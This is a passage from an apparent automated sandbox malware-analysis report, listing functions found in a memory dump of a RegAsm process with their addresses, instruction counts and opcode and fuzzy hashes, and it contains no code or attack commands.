                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                    • Instruction ID: c4c3912a3ce805d377ba7bdece5d877888dbde37c8b4fdb7be8733675bee9027
                                                    • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                    • Instruction Fuzzy Hash: 63319176A01208AFDB23DE58C980B6EB3BAEB807D4F198468EF159B250D770DD44CB50
                                                    Function 02F7A6C7 Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                    • Instruction ID: 3111a98224806bdb97cc7720bfbf56aee896dd1afd2cd4587cc5556d6125806f
                                                    • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                    • Instruction Fuzzy Hash: C231FC72B00B05AFD765CF69DD41B5AB7F8AF48794F15052DA65AC3650E730E900CB50
                                                    Function 02F457C0 Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: af2f67b2d31d8e645c761103838b9d35354392d8cd479e789c362cfc62b862d8
                                                    • Instruction ID: 60926320bddbb2e930127fbc24a1f1c5f5b21a6fa2082e0567fdddedcd097651
                                                    • Opcode Fuzzy Hash: af2f67b2d31d8e645c761103838b9d35354392d8cd479e789c362cfc62b862d8
                                                    • Instruction Fuzzy Hash: D4317E36B15A09BFDB51AB24DE50F99BBA6FF84390F445069EA0187B50DB74E830CB80
                                                    Function 02F492C5 Relevance: .1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                    • Instruction ID: ed7c8c685d00d449231c69ac3d95b01a8c984d426547e26948b73e3e28c205d3
                                                    • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                    • Instruction Fuzzy Hash: B53169B27082498FC711DF18D840A5ABBEAEF89394F04056AFE51973A0DB70DC04CBA2
                                                    Function 02F6438F Relevance: .1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 490d70403759ee6ae31e005ee404f6a5ee0a083d38bcbfeafba23b2ce8a66100
                                                    • Instruction ID: d59aa143ced4a07b441b799be2d5a0917f365da54967f9ea7f901294c995463c
                                                    • Opcode Fuzzy Hash: 490d70403759ee6ae31e005ee404f6a5ee0a083d38bcbfeafba23b2ce8a66100
                                                    • Instruction Fuzzy Hash: C831B332B002459FC724FFA9CA85A7EB7FAEB84388F008569DA05D7694D730D941CF50
                                                    Function 02F97190 Relevance: .1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                    • Instruction ID: ccda04a40272cb0ae682214f92e9ffa99a3fc1c12294257592a8e304f282e43d
                                                    • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                    • Instruction Fuzzy Hash: 173155B5A14306CFCB10CF19C480A16FBE5FF89394B2885A9EA489B315E730ED46CF91
                                                    Function 02FFC3CD Relevance: .1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                    • Instruction ID: 9eb91abbbe0ec25635e7634819572762cb1c65f9575162d308b231ae24bdb1d4
                                                    • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                    • Instruction Fuzzy Hash: FC213D36600669B6CB15EBA58D00BBBB7B6EF407D4F40801BFB95876B1E734D940C760
                                                    Function 02F3C156 Relevance: .1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 19d152faadeafa87ae13ce1327fb3b7a768b2787e7751274202527165b767bbc
                                                    • Instruction ID: 4c6e1d441a4465af1dc128f2969545873db1a9a29dfa1325a1f7d02f522ca38d
                                                    • Opcode Fuzzy Hash: 19d152faadeafa87ae13ce1327fb3b7a768b2787e7751274202527165b767bbc
                                                    • Instruction Fuzzy Hash: 303129729002149BDB21BF28CC40B7977B5AF41394FA481A9DF859F342DF759986CF90
                                                    Function 02F3E388 Relevance: .1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                    • Instruction ID: a16f551c63c259e1348a4e44becdf3803058b50ee4e99fbecfaeca866ce002d4
                                                    • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                    • Instruction Fuzzy Hash: B4318D31600644EFEB21DF68C984F6AB7F9EF49394F1445A9EA529B690E730EE01CB50
                                                    Function 02FBE609 Relevance: .1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 81ea53fde38cffeea0433599444f5d0d838ada34ac2d7ad17cfd14436a7a8cb6
                                                    • Instruction ID: 1f9cbab6fcdb4bc3b3b4afa4367600d1c5604b3d060fe042a60f1dd46b9770d8
                                                    • Opcode Fuzzy Hash: 81ea53fde38cffeea0433599444f5d0d838ada34ac2d7ad17cfd14436a7a8cb6
                                                    • Instruction Fuzzy Hash: 5531D175A10209EFCB15CF29C880AEEB7B6FF84344B514569E9059B392E731ED40CF95
                                                    Function 02F43616 Relevance: .1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c9ac82d275c4dccad0fc859afd8d7de2d534225d352dcd3f7815656cb0343222
                                                    • Instruction ID: 52e2327c2aa0b504005866b6f5d4715d369e02bfefc8798630dfe1fbf31cff03
                                                    • Opcode Fuzzy Hash: c9ac82d275c4dccad0fc859afd8d7de2d534225d352dcd3f7815656cb0343222
                                                    • Instruction Fuzzy Hash: A9210131606255AFCB21AF04C984F2ABFA5BF81B94F6005A9EF454B746CBB1E804CF91
                                                    Function 02F6F32A Relevance: .1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                    • Instruction ID: f1194a7aa1713feb56197365a364c077e67b563249df673a62fbbf34279283f7
                                                    • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                    • Instruction Fuzzy Hash: BC21C2722002009FC719DF15D845B66B7EAEF863A4F15426DE207CBA90EB74E841CB94
                                                    Function 02FC06F1 Relevance: .1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 54fc43fba7c6151bb49357fdd29b7f239b6d3d993c84fb50a026036c49ab1ddb
                                                    • Instruction ID: 85419d4a7f47d8873e4c1cd5e721b696482bba07e6ee9e9f6a296d5185f0bd07
                                                    • Opcode Fuzzy Hash: 54fc43fba7c6151bb49357fdd29b7f239b6d3d993c84fb50a026036c49ab1ddb
                                                    • Instruction Fuzzy Hash: 1E219F71A00229DBCF15DF59C981ABEB7F9FF48784B500069EA41AB250D778AD52CFA0
                                                    Function 02FC019F Relevance: .1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cd9e9eb27332d8a013dd8beef580cd48bb362e110dcf75ac33525d81943610ba
                                                    • Instruction ID: 4a809a3d0f651ba8eb24e6e676d34c87685179177763aeaf67a979b462c02fff
                                                    • Opcode Fuzzy Hash: cd9e9eb27332d8a013dd8beef580cd48bb362e110dcf75ac33525d81943610ba
                                                    • Instruction Fuzzy Hash: E6219A71A00655EBD7159B68CD40B6AB7A8EF48784F2400A9FA05D76A0DB34ED41CB64
                                                    Function 02F79660 Relevance: .1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5546549bf5c0ffc170d9a3a4e81c38abf90de17bb28596846e5a6fef83c6331
                                                    • Instruction ID: cec974ecc75d1b0ddeb27935e5b3b725f2c230c813fd8fd41fffe91be304768c
                                                    • Opcode Fuzzy Hash: b5546549bf5c0ffc170d9a3a4e81c38abf90de17bb28596846e5a6fef83c6331
                                                    • Instruction Fuzzy Hash: B62127316057889BCF32AB26CC54B2677A6EF443E0F10072AEB52465A4EB76A841CF51
                                                    Function 02FC0283 Relevance: .1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8506d45093f767843d2fbbe326fd385f2e82f046f3ac373c36d4282d63b9358a
                                                    • Instruction ID: d9452a027c125df5f65b88ead05ba0781f0d8d3c518c6d601d0fbc10256999c7
                                                    • Opcode Fuzzy Hash: 8506d45093f767843d2fbbe326fd385f2e82f046f3ac373c36d4282d63b9358a
                                                    • Instruction Fuzzy Hash: 4021A472908346DBD711EF59C948BABB7DCAF912C4F18045EBE80C7251DB34D546CBA1
                                                    Function 02FE71F9 Relevance: .1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fdcf1934a6da0963ac925d575a29b6f8ea24517e19653b86b763e4c38cebf9ed
                                                    • Instruction ID: 1f19f51e949f5d3adeab1fce6c4427e8f4b11c8943d86b39119b265929e31eca
                                                    • Opcode Fuzzy Hash: fdcf1934a6da0963ac925d575a29b6f8ea24517e19653b86b763e4c38cebf9ed
                                                    • Instruction Fuzzy Hash: F321D331E047418BCB22FF658840B6BF7E9AFC5394F104A2DFAA797150DB60A9458F92
                                                    Function 02FBD0C0 Relevance: .1, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                    • Instruction ID: 9cbf088b07c0b840261af59aafc0e81b845f372c4f25f295392f9aab4fbf675f
                                                    • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                    • Instruction Fuzzy Hash: 3B21D772A44700ABE3129F19CC41B9BBBA5FF88790F10012DFA45973A0D330E800CB9A
                                                    Function 02F7A30B Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2f3c48cb0b8ec6b4581279f30249441018753b4fec6d266c66f2c7a69a6e07a9
                                                    • Instruction ID: 5f0dffb6ba68b5ad8484e5cb2f7ce08431e3cf117824cae8bfdbc28c08cfa06f
                                                    • Opcode Fuzzy Hash: 2f3c48cb0b8ec6b4581279f30249441018753b4fec6d266c66f2c7a69a6e07a9
                                                    • Instruction Fuzzy Hash: F221CF366016509FC725DF29CC41B4673F9EF09784F148469A649CBB61E331E842CF94
                                                    Function 02FD80A8 Relevance: .1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                    • Instruction ID: c727934e0ffb9d07176d7221424202a5ba83ad418f8da13aa56f4e9b8ee1adec
                                                    • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                    • Instruction Fuzzy Hash: 90216A72A00209AFEB129F98CC44BAEBBBAEF88390F240459FA01A7250D734D951CB50
                                                    Function 02F3B765 Relevance: .1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3982a38bea68db09dbffde72945e7f995e96447837a908e0c0e8ae81110f0182
                                                    • Instruction ID: d8f4aa012840a17abd37794d932079d523e71cbbba9822642a9c95bf7f28ccfe
                                                    • Opcode Fuzzy Hash: 3982a38bea68db09dbffde72945e7f995e96447837a908e0c0e8ae81110f0182
                                                    • Instruction Fuzzy Hash: 37215572141A00EFC722EF69CE51F19B7FAFB08788F144969E206866A1CB35A841CF54
                                                    Function 02F70124 Relevance: .1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                    • Instruction ID: 6edefdd58f14836ccdb4579696a8750fdd1e85a93594fc93807d660280107641
                                                    • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                    • Instruction Fuzzy Hash: 0F11B273601604BFE7229B54CC41F9BBBB9EF80794F20402AF7059B190DAB1ED44CB50
                                                    Function 02F48770 Relevance: .1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c8bf50090bb5b943230c4a83f6339be4e13c696759108d871496cf03c62eb566
                                                    • Instruction ID: c207ccd05b79885a2106b2c01064f0d11d62e2d0239ea4836c5ca33748c3e4d9
                                                    • Opcode Fuzzy Hash: c8bf50090bb5b943230c4a83f6339be4e13c696759108d871496cf03c62eb566
                                                    • Instruction Fuzzy Hash: 5F11C831B016189BCB11CF49C9D0E26BBE9EF4A7D4B154069EE089F205DBF2D901C790
                                                    Function 02F480E9 Relevance: .1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5e875e87b85571ea56e615e13cd830434a033cb2b810f875c1fa089980e51392
                                                    • Instruction ID: 1adabf36a1d7dc2755122e3026234ba1a81a1e26c5726f48b679607b115de85c
                                                    • Opcode Fuzzy Hash: 5e875e87b85571ea56e615e13cd830434a033cb2b810f875c1fa089980e51392
                                                    • Instruction Fuzzy Hash: A1219F32A00205DFDB14CF58C980B6EBBB5FB88398F20416ED205A7310CBB1AD46CBD0
                                                    Function 02F7674D Relevance: .1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bcf417e4106fc33997c49d3193925aa786d48f7087e6d7828fe7f11373d380c8
                                                    • Instruction ID: ab2e66c38f82567e6ef0c64e9fd634a3d230948fc450fb7e8fd44dc273449cb5
                                                    • Opcode Fuzzy Hash: bcf417e4106fc33997c49d3193925aa786d48f7087e6d7828fe7f11373d380c8
                                                    • Instruction Fuzzy Hash: 31215C75611A04EFC7209F69D881F66B3E9FF447D0F44882EE6AAC7650DB70A851CB60
                                                    Function 02F39240 Relevance: .1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1ca1e5c9390b874d5dfed79297db47f5887242f4c49fd474c6102930c1d77684
                                                    • Instruction ID: b839c2fcc558a6536e9c22eaad6595baea6622fd8e5bb57e754883f2d79acb18
                                                    • Opcode Fuzzy Hash: 1ca1e5c9390b874d5dfed79297db47f5887242f4c49fd474c6102930c1d77684
                                                    • Instruction Fuzzy Hash: FA11043B152245EBD725AF55E881A7237ECEB54BC4F104065EA0097394D379DD01CF64
                                                    Function 02F766B0 Relevance: .1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d4d9d56954de3d380fd43eada498a57850dff54545f2f98aec6608cdeba625eb
                                                    • Instruction ID: 306a5d1173d653ad3ef64df2593fee491f2ecd24e509b34a7fe8f451850ce9b2
                                                    • Opcode Fuzzy Hash: d4d9d56954de3d380fd43eada498a57850dff54545f2f98aec6608cdeba625eb
                                                    • Instruction Fuzzy Hash: CB11BC76A01658AFCB24DF59D980A5ABBFDAB847D0B11807ADA05DB310DB34DD02CBA0
                                                    Function 02F627ED Relevance: .1, Instructions: 58COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9b1aeedeb21fb7a7ba48e095fb59f364712df9d4c695d79b273730c274a2a7f2
                                                    • Instruction ID: 532db3b9debebb0247fe4e1045c03b02f33654dc0b967bebcd3a942519f6f19c
                                                    • Opcode Fuzzy Hash: 9b1aeedeb21fb7a7ba48e095fb59f364712df9d4c695d79b273730c274a2a7f2
                                                    • Instruction Fuzzy Hash: 90010472B06644AFE326A2699C98F3776ADEF407D4F0500A6FF029B240DB14DC00C2A1
                                                    Function 02F6B052 Relevance: .1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 245bedfc1fb216d09b13a1abaa4f0a731d530f4717bb45bc012b46c17bc0f97a
                                                    • Instruction ID: f279571c2bd4f34183bb392d34972f0bfacce90c3f267400dd960ac3354c753c
                                                    • Opcode Fuzzy Hash: 245bedfc1fb216d09b13a1abaa4f0a731d530f4717bb45bc012b46c17bc0f97a
                                                    • Instruction Fuzzy Hash: 15019B72B003447BD720ABA9DC89F7BBAFDEF84798F040465E705E7141D771E9018A61
                                                    Function 02FFD6F0 Relevance: .1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                    • Instruction ID: 7596d3331fdb60141fa241fc2e84cd7e54f94f6b4dea9b6cf7d17464725d2fcb
                                                    • Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                    • Instruction Fuzzy Hash: 2701617670014DABDB05DAA6DE44DAF7BBDEF85A98F004069AB05D7250E770EE01CB60
                                                    Function 02F44690 Relevance: .1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d98ccb0e408f7aa831d280986f52336b69d02ffae3e7b77d2fadbcfad8f1c3c
                                                    • Instruction ID: 8ef71032ecd1892a00e9283f29609d26013f0923684d4077c8065e28b7f56b74
                                                    • Opcode Fuzzy Hash: 3d98ccb0e408f7aa831d280986f52336b69d02ffae3e7b77d2fadbcfad8f1c3c
                                                    • Instruction Fuzzy Hash: 2611A036641648AFDB25CF59D880F567FB9EB86BE8F004115FA04AB350CBB4E801CF60
                                                    Function 02F76620 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b8d642c89d726556f32a85438e1453d8b9ce4f547b7e7db83d44ac856913e61b
                                                    • Instruction ID: 8a8f390b0559081c2f7ec913e1ea0c274b00238b93950b6085195646cc13eae4
                                                    • Opcode Fuzzy Hash: b8d642c89d726556f32a85438e1453d8b9ce4f547b7e7db83d44ac856913e61b
                                                    • Instruction Fuzzy Hash: A7117076901B15ABCB21EB59DD80B5EF7BDEF48784F90045ADA05AB200DB70AD458F60
                                                    Function 02F37330 Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
